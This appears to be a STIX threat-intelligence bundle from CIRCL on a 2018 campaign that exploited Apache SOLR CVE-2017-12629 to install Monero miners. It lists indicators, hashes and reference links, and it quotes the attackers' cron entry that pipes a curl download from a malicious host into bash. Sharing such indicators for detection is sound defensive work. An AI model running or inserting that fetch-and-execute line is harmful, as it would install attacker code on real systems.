{ "type": "bundle", "id": "bundle--5aa23875-d0dc-49d6-82a6-d309950d210f", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T10:46:53.000Z", "modified": "2018-03-09T10:46:53.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--5aa23875-d0dc-49d6-82a6-d309950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T10:46:53.000Z", "modified": "2018-03-09T10:46:53.000Z", "name": "OSINT - Apache SOLR: the new target for cryptominers", "published": "2018-03-09T10:47:00Z", "object_refs": [ "vulnerability--5aa238c3-5d80-4e7b-b10b-bcef950d210f", "x-misp-attribute--5aa238d2-e450-49d6-bc69-d1cf950d210f", "observed-data--5aa238df-6aa0-47f7-a5dc-bcf2950d210f", "url--5aa238df-6aa0-47f7-a5dc-bcf2950d210f", "indicator--5aa238ef-b014-436e-8ffd-bcef950d210f", "indicator--5aa238f0-6154-41bc-b555-bcef950d210f", "observed-data--5aa23a20-5738-495a-8c04-bdba950d210f", "url--5aa23a20-5738-495a-8c04-bdba950d210f", "observed-data--5aa23a21-e0c4-44c4-862d-bdba950d210f", "url--5aa23a21-e0c4-44c4-862d-bdba950d210f", "observed-data--5aa23a22-11a4-4be7-bc40-bdba950d210f", "url--5aa23a22-11a4-4be7-bc40-bdba950d210f", "x-misp-attribute--5aa24db3-ab7c-4f72-9ae8-bcf2950d210f", "indicator--5aa23952-98bc-429a-90e3-bcf2950d210f", "indicator--5aa239f1-e340-4ce1-ad60-d1cf950d210f", "indicator--9e8fc8b5-70d8-445c-8e8d-f004090a0793", "x-misp-object--98e27b75-981b-467e-bfe6-36b058da4dc4", "relationship--d708b6fa-5398-4034-9b5b-6fb8d5e6e9bd" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "dnc:malware-type=\"CoinMiner\"", "osint:source-type=\"blog-post\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "vulnerability", "spec_version": "2.1", "id": "vulnerability--5aa238c3-5d80-4e7b-b10b-bcef950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:40:58.000Z", "modified": "2018-03-09T07:40:58.000Z", "name": "CVE-2017-12629", "labels": [ "misp:type=\"vulnerability\"", "misp:category=\"Payload delivery\"" ], "external_references": [ { "source_name": "cve", "external_id": "CVE-2017-12629" } ] }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5aa238d2-e450-49d6-bc69-d1cf950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T09:03:41.000Z", "modified": "2018-03-09T09:03:41.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"" ], "x_misp_category": "External analysis", "x_misp_type": "text", "x_misp_value": "Earlier this year, I wrote about a campaign targeting vulnerable Oracle WebLogic installations to deploy cryptocurrency miners [1] . Based on some of the mining pool statistics associated with these installs, criminals were quite successful. Now that most Oracle WebLogic servers are fixed, miscreants had to move to another target. Based on an incident I responded to on Thursday, vulnerable Apache SOLR servers may now be \u00e2\u20ac\u0153it\u00e2\u20ac\u009d.\r\n\r\nWithin 9 days (from Feb, 28 to Mar, 8) this single campaign exploited 1416 vulnerable Apache SOLR servers to deploy Monero XMRig miners across the globe. There are enough similarities between these two attacks to suggest that this is the same group that was responsible for the WebLogic campaign. Log formats, file names and even the basic install script for the miner are identical. Of course, it is always possible that we are just dealing with copycats. These scripts have been out in the open for a while now.\r\n\r\nThe flaw (CVE-2017-12629) [2] first announced October 12th 2017, affects Apache SOLR version 7.1 and below. Due to an incorrectly configured XML parser in the \u00e2\u20ac\u0153queryparser\u00e2\u20ac\u009d library, attackers can get access to sensitive information or execute arbitrary code on vulnerable systems.\r\n\r\nThe CVSS v2 score is only \"High\" (7.5). But an exploit has been widely available since October 17th, less than a week after the vulnerability was made public. It is no surprise that attackers quickly turned to this easily executed exploit. The CVSS v3 score of \"Critical\" (9.8) is probably more appropriate." }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5aa238df-6aa0-47f7-a5dc-bcf2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T09:03:39.000Z", "modified": "2018-03-09T09:03:39.000Z", "first_observed": "2018-03-09T09:03:39Z", "last_observed": "2018-03-09T09:03:39Z", "number_observed": 1, "object_refs": [ "url--5aa238df-6aa0-47f7-a5dc-bcf2950d210f" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5aa238df-6aa0-47f7-a5dc-bcf2950d210f", "value": "https://isc.sans.edu/diary/23425" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5aa238ef-b014-436e-8ffd-bcef950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:40:59.000Z", "modified": "2018-03-09T07:40:59.000Z", "description": "On port 8080", "pattern": "[domain-name:value = 'pool-proxy.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-03-09T07:40:59Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5aa238f0-6154-41bc-b555-bcef950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:41:00.000Z", "modified": "2018-03-09T07:41:00.000Z", "pattern": "[url:value = 'http://mms.kenguru.ru/includes/libraries/getsetup.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-03-09T07:41:00Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5aa23a20-5738-495a-8c04-bdba950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:41:00.000Z", "modified": "2018-03-09T07:41:00.000Z", "first_observed": "2018-03-09T07:41:00Z", "last_observed": "2018-03-09T07:41:00Z", "number_observed": 1, "object_refs": [ "url--5aa23a20-5738-495a-8c04-bdba950d210f" ], "labels": [ "misp:type=\"url\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5aa23a20-5738-495a-8c04-bdba950d210f", "value": "https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5aa23a21-e0c4-44c4-862d-bdba950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:41:01.000Z", "modified": "2018-03-09T07:41:01.000Z", "first_observed": "2018-03-09T07:41:01Z", "last_observed": "2018-03-09T07:41:01Z", "number_observed": 1, "object_refs": [ "url--5aa23a21-e0c4-44c4-862d-bdba950d210f" ], "labels": [ "misp:type=\"url\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5aa23a21-e0c4-44c4-862d-bdba950d210f", "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12629" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5aa23a22-11a4-4be7-bc40-bdba950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:41:01.000Z", "modified": "2018-03-09T07:41:01.000Z", "first_observed": "2018-03-09T07:41:01Z", "last_observed": "2018-03-09T07:41:01Z", "number_observed": 1, "object_refs": [ "url--5aa23a22-11a4-4be7-bc40-bdba950d210f" ], "labels": [ "misp:type=\"url\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5aa23a22-11a4-4be7-bc40-bdba950d210f", "value": "https://www.securityfocus.com/bid/101261/info" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5aa24db3-ab7c-4f72-9ae8-bcf2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T09:02:43.000Z", "modified": "2018-03-09T09:02:43.000Z", "labels": [ "misp:type=\"pattern-in-file\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Artifacts dropped", "x_misp_type": "pattern-in-file", "x_misp_value": "25 0,3,6,9,12,15,18 * * * curl -s \"hxxp://mms.kenguru.ru/includes/libraries/getsetup.php?p=sl\" | bash" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5aa23952-98bc-429a-90e3-bcf2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:35:46.000Z", "modified": "2018-03-09T07:35:46.000Z", "pattern": "[file:hashes.SHA256 = '7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c' AND file:name = 'fs-manager' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-03-09T07:35:46Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5aa239f1-e340-4ce1-ad60-d1cf950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:38:25.000Z", "modified": "2018-03-09T07:38:25.000Z", "pattern": "[file:hashes.SHA256 = 'a3bbc8d3c4a950fa0b0def4109a07e9d01bae157781ff7a4b07910340e021dc7' AND file:name = 'config.json' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-03-09T07:38:25Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9e8fc8b5-70d8-445c-8e8d-f004090a0793", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:41:04.000Z", "modified": "2018-03-09T07:41:04.000Z", "pattern": "[file:hashes.MD5 = '09536b6ee3e600e73436715030467ec9' AND file:hashes.SHA1 = 'ea0a6633b2f8592028c31aefbfe8f8165076b786' AND file:hashes.SHA256 = '7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-03-09T07:41:04Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--98e27b75-981b-467e-bfe6-36b058da4dc4", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-03-09T07:41:03.000Z", "modified": "2018-03-09T07:41:03.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c/analysis/1519925650/", "category": "External analysis", "uuid": "5aa23a90-e4bc-4ba6-8338-d78802de0b81" }, { "type": "text", "object_relation": "detection-ratio", "value": "22/60", "category": "Other", "uuid": "5aa23a91-9ae4-42e4-a3ef-d78802de0b81" }, { "type": "datetime", "object_relation": "last-submission", "value": "2018-03-01T17:34:10", "category": "Other", "uuid": "5aa23a91-ffb8-41ad-8a57-d78802de0b81" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d708b6fa-5398-4034-9b5b-6fb8d5e6e9bd", "created": "2018-03-09T07:41:05.000Z", "modified": "2018-03-09T07:41:05.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--9e8fc8b5-70d8-445c-8e8d-f004090a0793", "target_ref": "x-misp-object--98e27b75-981b-467e-bfe6-36b058da4dc4" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }